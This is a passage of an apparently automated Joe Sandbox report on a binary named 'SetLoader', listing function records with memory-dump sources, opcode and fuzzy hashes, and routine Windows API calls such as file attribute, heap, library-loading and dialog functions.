                                              • Instruction Fuzzy Hash: DB21F0312483919FC754DE24C891AFABBEAAF52B04F0C595CF4C1C7241D329E94CCBA2
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: H_prolog3_wcslen
                                              • String ID:
                                              • API String ID: 3746244732-0
                                              • Opcode ID: 9a4e207f0ed23bc0e2e4c6b4878d71f45f368f3b45dc31b35a73248415e8fa12
                                              • Instruction ID: d893c2530bc5ac6dc9ed6f4ade1f295e1e959617b109099351072d5bd762e016
                                              • Opcode Fuzzy Hash: 9a4e207f0ed23bc0e2e4c6b4878d71f45f368f3b45dc31b35a73248415e8fa12
                                              • Instruction Fuzzy Hash: F6214A71900219AECF51AF94C895AEDB7B3BF0C300F14492DF545AB2A1CB395A91CB58
                                              APIs
                                              • FreeLibrary.KERNEL32(00000000,?,006760C8,?,?,?,00636386,00000004,InitializeCriticalSectionEx,00649624,InitializeCriticalSectionEx,00000000,?,0063613D,006760C8,00000FA0), ref: 00636215
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0063621F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressFreeLibraryProc
                                              • String ID:
                                              • API String ID: 3013587201-0
                                              • Opcode ID: bb39bdeced5393a89079613438ec3e839d58f04f0cac50fdbe097cba7c80a7b0
                                              • Instruction ID: c06b4489d81141115966974bfd232ee47c4f0a5d6998640ae1d537f484e714a0
                                              • Opcode Fuzzy Hash: bb39bdeced5393a89079613438ec3e839d58f04f0cac50fdbe097cba7c80a7b0
                                              • Instruction Fuzzy Hash: 00118E36600515AF8B26CFA8DC908AA77B7FB46360B258269F9169B310E7309E11CBD0
                                              APIs
                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0061B907
                                              • GetLastError.KERNEL32 ref: 0061B914
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 91598bfbf87b261c895fd95fdb3c897656a08d71b4844011932a0dffa405ea1e
                                              • Instruction ID: acaf7f900e8af04eb569923d329f9053f5c1867224cabacda9c03154846f2724
                                              • Opcode Fuzzy Hash: 91598bfbf87b261c895fd95fdb3c897656a08d71b4844011932a0dffa405ea1e
                                              • Instruction Fuzzy Hash: FD11E530A40710AFD724DA39C8457E6B3EAAB06371F581A68E663922D0D770ED86C760
                                              APIs
                                              • _free.LIBCMT ref: 0063BB55
                                                • Part of subcall function 0063BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00636A24,?,0000015D,?,?,?,?,00637F00,000000FF,00000000,?,?), ref: 0063BCC0
                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,006550C4,0061190A,?,?,00000007,?,?,?,00611476,?,00000000), ref: 0063BB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Heap$AllocAllocate_free
                                              • String ID:
                                              • API String ID: 2447670028-0
                                              • Opcode ID: 61e272b8c51dd91ce0c8a29e5bfcde3c74b2d8b28de660df90f71ee6026152ae
                                              • Instruction ID: 8050a23cf49046ada6b4155f199da1413831eaf73966da956e7d255e9100dda5
                                              • Opcode Fuzzy Hash: 61e272b8c51dd91ce0c8a29e5bfcde3c74b2d8b28de660df90f71ee6026152ae
                                              • Instruction Fuzzy Hash: 50F0F631500215AADB212A66EC01FEBB75B9FC2BB0F14711AFB06962A5DF60CC0181ED
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0061BF5E,?,?), ref: 0061C305
                                                • Part of subcall function 0061DA1E: _wcslen.LIBCMT ref: 0061DA59
                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0061BF5E,?,?), ref: 0061C334
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AttributesFile$_wcslen
                                              • String ID:
                                              • API String ID: 2673547680-0
                                              • Opcode ID: 5ef334d135dfe6c10e5c67e48210b461303fb2d55152bd1b8ffbc173c97d3301
                                              • Instruction ID: e98eccce6051e462eaae81639f62645b9946260bf4eb7799aa1f0c0bbd42516b
                                              • Opcode Fuzzy Hash: 5ef334d135dfe6c10e5c67e48210b461303fb2d55152bd1b8ffbc173c97d3301
                                              • Instruction Fuzzy Hash: 8BF09A75201219ABDB00EF71CD01AEE77AEEF0A715F448099BA41E7250DB31DE848BA9
                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,0061B14B,?,00000000,0061AF6E,5CB4B331,00000000,0064517A,000000FF,?,00618882,?,?), ref: 0061BC82
                                                • Part of subcall function 0061DA1E: _wcslen.LIBCMT ref: 0061DA59
                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,0061B14B,?,00000000,0061AF6E,5CB4B331,00000000,0064517A,000000FF,?,00618882,?), ref: 0061BCAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: DeleteFile$_wcslen
                                              • String ID:
                                              • API String ID: 2643169976-0
                                              • Opcode ID: de9d86f94886be10274f096e992a597fe5bf073d683020056c7052fdbd840c60
                                              • Instruction ID: 567e5093590bb569673fb71a6b6409e84b54935f81c94c20d5a9033499a3809f
                                              • Opcode Fuzzy Hash: de9d86f94886be10274f096e992a597fe5bf073d683020056c7052fdbd840c60
                                              • Instruction Fuzzy Hash: F1F0BE35601229ABDB00DF60CE41EEE73ADAF0E741F484069BA01D7240DF70DE888BA9
                                              APIs
                                              • _swprintf.LIBCMT ref: 00630341
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00630358
                                                • Part of subcall function 0062D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0062D875
                                                • Part of subcall function 0062D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062D886
                                                • Part of subcall function 0062D864: IsDialogMessageW.USER32(00010418,?), ref: 0062D89A
                                                • Part of subcall function 0062D864: TranslateMessage.USER32(?), ref: 0062D8A8
                                                • Part of subcall function 0062D864: DispatchMessageW.USER32(?), ref: 0062D8B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                              • String ID:
                                              • API String ID: 2718869927-0
                                              • Opcode ID: bf2dba8a35abb3ac65d274e8ada0c9e8aaf6a7d4fe5a662d38221e9ba45730c6
                                              • Instruction ID: c6382dbbcbaf54149f97dadff58cfbb3af1478ea01d8b14d98b0d3ea8ecf80af
                                              • Opcode Fuzzy Hash: bf2dba8a35abb3ac65d274e8ada0c9e8aaf6a7d4fe5a662d38221e9ba45730c6
                                              • Instruction Fuzzy Hash: 61F024B250031C6ACB00EB69EC06EEF3BEE9B0D301F08005AB201E7152DA349A408BA5
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,0061BCD4,?,00618607,?), ref: 0061BCFA
                                                • Part of subcall function 0061DA1E: _wcslen.LIBCMT ref: 0061DA59
                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,0061BCD4,?,00618607,?), ref: 0061BD24
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AttributesFile$_wcslen
                                              • String ID:
                                              • API String ID: 2673547680-0
                                              • Opcode ID: 4c9366d844ec6eaf42bc3097fd24bfd867c861bd87685d75de0eebed9829319c
                                              • Instruction ID: 31f33864f296e1222dd91a7a60b26913615145e36983bed3d9e2779116b46529
                                              • Opcode Fuzzy Hash: 4c9366d844ec6eaf42bc3097fd24bfd867c861bd87685d75de0eebed9829319c
                                              • Instruction Fuzzy Hash: 18F0B436A002185BC700EB78DD019EEB3BEEF4F761F0401A9FA41E7280DB709D818695
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,006231C7,0061D526), ref: 00623191
                                              • GetProcessAffinityMask.KERNEL32(00000000,?,006231C7), ref: 00623198
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Process$AffinityCurrentMask
                                              • String ID:
                                              • API String ID: 1231390398-0
                                              • Opcode ID: 7a9a8e1f1c7c1a8682727b060f3a999861d47880f8af9f6ca8d8fb04bb0345fc
                                              • Instruction ID: 9b791756fed6b47774987b26e62c412637ab1d28688f318a096f3c8c1879107a
                                              • Opcode Fuzzy Hash: 7a9a8e1f1c7c1a8682727b060f3a999861d47880f8af9f6ca8d8fb04bb0345fc
                                              • Instruction Fuzzy Hash: 3DE0D876B0053567DF098BA4EC098EB73DFEA453043104079B503D3300FB38DE054AA0
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006228D4
                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00621309,Crypt32.dll,00000000,00621383,00000200,?,00621366,00000000,00000000,?), ref: 006228F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystem
                                              • String ID:
                                              • API String ID: 1175261203-0
                                              • Opcode ID: b40c3184bb6c7a496b4f17ffc61c9f4f30fbd54660c22aa032d9ba8179ab521a
                                              • Instruction ID: 201cde74c868adbaf731655c8b8cd212c18f6acc972dde9aa8417c114c619ae3
                                              • Opcode Fuzzy Hash: b40c3184bb6c7a496b4f17ffc61c9f4f30fbd54660c22aa032d9ba8179ab521a
                                              • Instruction Fuzzy Hash: A1F08276A00219ABCB10DF65DD05DDFB7FDEF4E751F000469B605D3100DA78EA858BA9
                                              APIs
                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0062C36E
                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0062C375
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: BitmapCreateFromGdipStream
                                              • String ID:
                                              • API String ID: 1918208029-0
                                              • Opcode ID: 773bd8cc15a7c5d6a06cd26cbb3533dbc14215175a9651de3dbb46d3d920f0c0
                                              • Instruction ID: 802a9769dd0513d449b1dc19afba38a3a648983d8c34dc0a7a9e597ded47c9d4
                                              • Opcode Fuzzy Hash: 773bd8cc15a7c5d6a06cd26cbb3533dbc14215175a9651de3dbb46d3d920f0c0
                                              • Instruction Fuzzy Hash: E3E06D71400618EBCB54DF95C800B9DB7F9EB05320F10C01EE88697200D770AE449F90
                                              APIs
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006351CA
                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 006351D5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                              • String ID:
                                              • API String ID: 1660781231-0
                                              • Opcode ID: dafc544f65bf1ac2c85a0a67fb98b028d8af5232608417e7c8017afb222c3bf5
                                              • Instruction ID: d00ff97ffcbf59107cb8fa71fb67d3b59395367f53c7528e1602b4987d74a812
                                              • Opcode Fuzzy Hash: dafc544f65bf1ac2c85a0a67fb98b028d8af5232608417e7c8017afb222c3bf5
                                              • Instruction Fuzzy Hash: 63D02324D44F01549D947670AD137AB17C35D02775FF0665DF423871C2DF12444065D5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ItemShowWindow
                                              • String ID:
                                              • API String ID: 3351165006-0
                                              • Opcode ID: 61ac8da7976a73c33d3a20562a9cd6b7ef36a61a6bebec4da534e86e243f79e9
                                              • Instruction ID: 9e82ca47aeb22eab80c18afdab91a76ce94fbad452f42ffef11ba2b3542a909a
                                              • Opcode Fuzzy Hash: 61ac8da7976a73c33d3a20562a9cd6b7ef36a61a6bebec4da534e86e243f79e9
                                              • Instruction Fuzzy Hash: F4C0123205C200BECB010BB0DC09C2ABBEAABA4222F58CA18F0AAC1060C239C050DB51
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00611331
                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00611338
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherItemUser
                                              • String ID:
                                              • API String ID: 4250310104-0
                                              • Opcode ID: cf98efa8eb9403097b657a7230fc1643fccc106d6cc4356ebf44888f4f5b9b5f
                                              • Instruction ID: 274041b684202332a233364c2a33f657c9d0feaaf236631c1547ee9e41998312
                                              • Opcode Fuzzy Hash: cf98efa8eb9403097b657a7230fc1643fccc106d6cc4356ebf44888f4f5b9b5f
                                              • Instruction Fuzzy Hash: 4BC04C7640C240BFCB055BB0DD0CC2FBFBAAB94311F94D959B5A981020C6358450DB51
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 4707c00383b97adcefaaa56e1e3cfdfc210809aa13ac31645f903962ef6b07eb
                                              • Instruction ID: e5c4ce6a38d5e91b976e6bfbb441ab52035b9f69c4b2e825cb7565ad1ca34d54
                                              • Opcode Fuzzy Hash: 4707c00383b97adcefaaa56e1e3cfdfc210809aa13ac31645f903962ef6b07eb
                                              • Instruction Fuzzy Hash: 84C1AF74A042559FDF25CF68C4947E97BA2AF0B310F1C00B9ED069F396CB749A85CBA1
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00611483
                                                • Part of subcall function 00616AE8: __EH_prolog3.LIBCMT ref: 00616AEF
                                                • Part of subcall function 0061EE0F: __EH_prolog3.LIBCMT ref: 0061EE16
                                                • Part of subcall function 0061668F: __EH_prolog3.LIBCMT ref: 00616696
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 6ffb642f0f24f6d1e3cf8bc5fe6f1f39c3b892392bd211d86751fed7481fa5a6
                                              • Instruction ID: f18128dbbd50883ee806c5eb6782a0b6cbaea1f67a9bd5cff8ce317036021a70
                                              • Opcode Fuzzy Hash: 6ffb642f0f24f6d1e3cf8bc5fe6f1f39c3b892392bd211d86751fed7481fa5a6
                                              • Instruction Fuzzy Hash: 904116B1A063808ECB54DF6994812D97BE2AF5A300F0C01BEEC5DCF29BD7715255CBA6
                                              APIs
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0063D348
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
